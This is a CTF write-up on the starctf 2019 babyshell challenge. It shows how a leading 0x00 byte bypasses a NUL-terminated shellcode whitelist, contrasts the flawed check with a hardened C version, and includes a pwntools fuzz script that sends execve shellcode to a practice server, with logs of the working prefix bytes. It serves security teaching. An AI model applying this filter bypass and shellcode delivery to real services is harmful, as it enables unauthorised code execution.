While working on a challenge today I ran into an interesting problem: we submit shellcode, and once it passes a given check the shellcode is executed. The usual approach is to piece together shellcode that fits the constraints, but there is a very neat approach online that bypasses the check entirely, after which pwntools' built-in shellcode can be used as-is to get a shell. This is a short write-up of that approach.
checksec
checksec starctf_2019_babyshell
[*] '/home/fuzz/Desktop/ctf/starctf_2019_babyshell'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Vulnerable function
The main function is as follows:
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  _BYTE *buf; // [rsp+0h] [rbp-10h]

  sub_4007F8();
  buf = mmap(0LL, 0x1000uLL, 7, 34, 0, 0LL);
  puts("give me shellcode, plz:");
  read(0, buf, 0x200uLL);
  if ( !(unsigned int)sub_400786(buf) )
  {
    printf("wrong shellcode!");
    exit(0);
  }
  ((void (*)(void))buf)();
  return 0LL;
}
sub_4007F8() only does initialization and can be ignored; sub_400786 checks whether every byte of the shellcode belongs to the allowed set:
__int64 __fastcall sub_400786(_BYTE *a1)
{
  const char *i; // [rsp+18h] [rbp-10h]

  while ( *a1 )
  {
    for ( i = aZzjLovesShellC; *i && *i != *a1; ++i )// ZZJ loves shell_code,and here is a gift:
      ;
    if ( !*i )
      return 0LL;
    ++a1;
  }
  return 1LL;
}
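The weak point is the loop condition while ( *a1 ): the scan ends at the first NUL byte, so a buffer whose first byte is 0x00 is accepted without a single byte being inspected. To make this concrete, here is an added C model of the check beside a length-aware version (example code, not the challenge binary's source): check_nul_terminated mirrors sub_400786, while check_full_length validates every byte that read() actually returned. The whitelist string and the sample input are constructed stand-ins, since the page shows only the start of the real gift string.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Whitelist stand-in: the page only shows the beginning of the binary's
 * "gift" string, so this is a constructed approximation of it. */
static const char ALLOWED[] = "ZZJ loves shell_code,and here is a gift:";

/* Model of sub_400786 as decompiled above: the scan stops at the first
 * NUL, so a buffer whose first byte is 0x00 is accepted unexamined. */
bool check_nul_terminated(const unsigned char *buf)
{
    while (*buf) {
        if (strchr(ALLOWED, *buf) == NULL)
            return false;
        ++buf;
    }
    return true;
}

/* Hardened check: validate all `len` bytes that read() returned, not
 * just up to the first NUL. 0x00 is rejected explicitly because strchr()
 * would otherwise match it against the whitelist's own terminator. */
bool check_full_length(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; ++i) {
        if (buf[i] == 0 || strchr(ALLOWED, buf[i]) == NULL)
            return false;
    }
    return true;
}

/* Constructed input: the 00 42 00 prefix discussed in the write-up
 * followed by whitelisted filler. This is not real shellcode. */
static const unsigned char SAMPLE[] = { 0x00, 0x42, 0x00, 'Z', 'Z', 'J' };
#define SAMPLE_LEN (sizeof SAMPLE)

int main(void)
{
    printf("nul-terminated check: %s\n",
           check_nul_terminated(SAMPLE) ? "accepted" : "rejected");
    printf("full-length check:    %s\n",
           check_full_length(SAMPLE, SAMPLE_LEN) ? "accepted" : "rejected");
    return 0;
}
```

The original check accepts the sample because it never looks past the leading NUL; the length-aware check rejects it on the very first byte.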
Writeup
Following the article "The clever use of 0x00 in assembly language" (link below), we can use 0x00 to bypass the check: because the loop in sub_400786 stops at the first NUL byte, we need a prefix that contains 0x00, and that prefix must not interfere with the execution of the shellcode that follows it.
link:https://blog.csdn.net/A951860555/article/details/120043354
The method described there uses pwn disasm to find usable opcodes; obviously 00 42 00 is not the only option:
pwn disasm -c amd64 004200
0: 00 42 00 add BYTE PTR [rdx+0x0], al
We can fuzz to find out exactly which bytes work, using the script below:
from pwn import *
import time

context.arch = "amd64"
success_list = []
# context(log_level='debug', arch='amd64', os='linux')
p = remote('node5.buuoj.cn', 27030)
for first_byte in range(0x01, 0x100):
    try:
        # two-byte prefix: 0x00 followed by the candidate byte
        pay = bytes([0x00, first_byte]) + asm(shellcraft.execve("/bin/ls"))
        p.sendafter(b'plz:', pay)
        time.sleep(0.5)
        # p.send('ls')
        # data = p.recv()
        data2 = p.recvlines(10)
        print(f'data:{data2}')
        if b'flag' in data2:
            print(f'success:{hex(first_byte)}')
            success_list.append(hex(first_byte))
        p.close()
    except Exception:
        # the process crashed or the connection dropped: reconnect and move on
        p = remote('node5.buuoj.cn', 27030)
print(f'success_list:{success_list}')
This gives the following result:
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc0
[*] Closed connection to node5.buuoj.cn port 25948
success_list:['0x2', '0x6', '0xa', '0xe', '0x12', '0x16', '0x1a', '0x1e', '0x22', '0x26', '0x2a', '0x2e', '0x32', '0x36', '0x3a', '0x3e', '0xc0', '0xc2', '0xc4', '0xc6', '0xc8', '0xca', '0xcc', '0xce', '0xd0', '0xd2', '0xd4', '0xd6', '0xd8', '0xda', '0xdc', '0xde', '0xe0', '0xe2', '0xe4', '0xe6', '0xe8', '0xea', '0xec', '0xee', '0xf0', '0xf2', '0xf4', '0xf6', '0xf8', '0xfa', '0xfc', '0xfe']
Now let's try three-byte opcodes:
pay = bytes([0x00, first_byte, 0x00]) + asm(shellcraft.execve("/bin/ls"))
This gives the following result:
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x42
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
The same cycle repeats for every candidate; the middle bytes that succeeded in the captured log were 0x42, 0x45, 0x46, 0x47, 0x4a, 0x4d, 0x4e, 0x4f, 0x52, 0x55, 0x56, 0x57, 0x5a, 0x5d, 0x5e, 0x5f, 0x62, 0x65, 0x66, 0x67, 0x6a, 0x6d, 0x6e, 0x6f, 0x72, 0x75, 0x76, 0x77, 0x7a, 0x7d, 0x7e, 0x7f.